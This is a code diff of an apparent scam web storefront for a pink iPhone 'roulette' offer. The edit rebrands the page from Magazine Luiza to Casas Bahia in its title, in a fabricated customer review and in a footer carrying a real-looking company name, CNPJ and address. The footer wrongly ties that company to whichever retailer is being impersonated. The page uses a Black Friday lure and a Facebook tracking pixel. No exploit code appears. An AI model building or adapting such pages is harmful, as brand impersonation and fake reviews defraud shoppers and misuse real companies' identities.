--- a/roleta/loja/iphonerosa/index.html
+++ b/roleta/loja/iphonerosa/index.html
@@ -1,7 +1,7 @@
 <html lang="pt-br"><head>
   <meta charset="UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
-  <title>Magazine Luiza</title>
+  <title>Casas Bahia</title>
 <!-- Meta Pixel Code -->
 <script async="" src="js/fbevents.js"></script><script async="" src="js/fbevents_1.js"></script><script>
 !function(f,b,e,v,n,t,s)
@@ -83,7 +83,7 @@ src="https://www.facebook.com/tr?id=1602243840706168&ev=PageView&noscript=1"
 <link rel="stylesheet" href="css/fonts.css">
 <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@24,400,1,0">
 <link rel="icon" href="images_1">
-<link rel="shortcut icon" href="images_1">      <title>Magazine Luiza</title>
+<link rel="shortcut icon" href="images_1">      <title>Casas Bahia</title>
    </head>
    <body>
       <div style="background-color: #0086FF; text-align: center; padding: 5px; font-family: 'GellixMedium'; font-size: 13px; color: white">Promoção exclusiva: Black Friday</div>
@@ -214,7 +214,7 @@ src="https://www.facebook.com/tr?id=1602243840706168&ev=PageView&noscript=1"
                <img src="images/celular_rosa_review_1.jpg" alt="Review Image 2">
                <img src="images/celular_rosa_review_2.jpg" alt="Review Image 2">
             </div>
-            <p>chegou em perfeito estado, só achei a proteção um pouco ruim, a caixa do celular veio solto em uma caixa do Magazine Luiza grande, sem proteção nas laterais, mas o veio sem nenhum arranhão mesmo assim, o celular chegou super rápido.</p>
+            <p>chegou em perfeito estado, só achei a proteção um pouco ruim, a caixa do celular veio solto em uma caixa do Casas Bahia grande, sem proteção nas laterais, mas o veio sem nenhum arranhão mesmo assim, o celular chegou super rápido.</p>
             <div class="actions">
                <button class="like-button" onclick="toggleLike(this)">
                <span class="material-symbols-outlined" style="color: black">thumb_up</span> É útil <span class="count">33</span>
@@ -226,7 +226,7 @@ src="https://www.facebook.com/tr?id=1602243840706168&ev=PageView&noscript=1"
          </div>
       </div>
       <div class="divisoria"></div>
-      <p style="margin-left: 3%; margin-right: 3%; font-family: 'GellixRegular'; font-size: 14px; padding-top: 5px;"><span style="font-family: 'GellixSemiBold';">Termos e condições. Como cuidamos da sua privacidade. Acessibilidade Informações sobre seguros Blog Afiliados Tendências</span><br><br>© 1999-2024 Ebazar.com.br LTDA.CNPJ n.º 03.007.331/0001-41 / Av. das Nações Unidas, nº 3.003, Bonfim, Osasco/SP - CEP 06233-903 - empresa do grupo Magazine Luiza.<span style="font-family: 'GellixSemiBold';"><br><br>Brasil/Português</span></p>
+      <p style="margin-left: 3%; margin-right: 3%; font-family: 'GellixRegular'; font-size: 14px; padding-top: 5px;"><span style="font-family: 'GellixSemiBold';">Termos e condições. Como cuidamos da sua privacidade. Acessibilidade Informações sobre seguros Blog Afiliados Tendências</span><br><br>© 1999-2024 Ebazar.com.br LTDA.CNPJ n.º 03.007.331/0001-41 / Av. das Nações Unidas, nº 3.003, Bonfim, Osasco/SP - CEP 06233-903 - empresa do grupo Casas Bahia.<span style="font-family: 'GellixSemiBold';"><br><br>Brasil/Português</span></p>
       <script src="responda.html"></script>
       <script>
          document.querySelectorAll('.thumbnails img').forEach(image => {
